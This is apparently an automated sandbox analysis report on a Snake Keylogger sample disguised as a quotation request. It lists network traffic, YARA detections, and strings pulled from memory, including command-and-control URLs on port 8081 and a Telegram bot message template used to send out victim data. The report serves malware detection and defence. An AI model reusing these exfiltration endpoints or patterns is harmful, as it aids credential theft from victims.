Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49720 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Wed, 20 Nov 2024 08:33:16 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Wed, 20 Nov 2024 08:33:21 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4514730416.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4514730416.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2113939122.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000B.00000002.2160677274.000000000259B000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4514729893.0000000000435000.00000040.00000400.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20a
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003250000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003241000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: jnqeRRexnD.exe, 0000000E.00000002.4517414324.000000000324B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlBsq
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.000000000314E000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.00000000030DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4514730416.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.00000000030DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E29000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.000000000314E000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003281000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.000000000327C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lBsq
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002F94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/x
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49767 version: TLS 1.2

System Summary

Source: 14.2.jnqeRRexnD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.jnqeRRexnD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: initial sample Static PE information: Filename: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBE6B0 14_2_06DBE6B0
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBE6AE 14_2_06DBE6AE
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBE258 14_2_06DBE258
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBE249 14_2_06DBE249
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB1E70 14_2_06DB1E70
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBDE00 14_2_06DBDE00
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB9BFB 14_2_06DB9BFB
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB8B91 14_2_06DB8B91
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB178F 14_2_06DB178F
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBF3B8 14_2_06DBF3B8
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB8BA0 14_2_06DB8BA0
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBEF51 14_2_06DBEF51
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBEF60 14_2_06DBEF60
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBEB08 14_2_06DBEB08
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB9328 14_2_06DB9328
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB0B20 14_2_06DB0B20
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBD0F8 14_2_06DBD0F8
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBCCA0 14_2_06DBCCA0
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB0040 14_2_06DB0040
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB501F 14_2_06DB501F
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBF801 14_2_06DBF801
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB0007 14_2_06DB0007
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBDDFE 14_2_06DBDDFE
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBD999 14_2_06DBD999
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBD9A8 14_2_06DBD9A8
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBD550 14_2_06DBD550
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DBD540 14_2_06DBD540
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003CEA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2118483464.0000000006F90000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000000.2057334200.0000000000692000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamewzxU.exe6 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2113939122.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2112009646.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2118838113.0000000007730000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4515200414.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4514730416.0000000000441000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Binary or memory string: OriginalFilenamewzxU.exe6 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 14.2.jnqeRRexnD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.jnqeRRexnD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
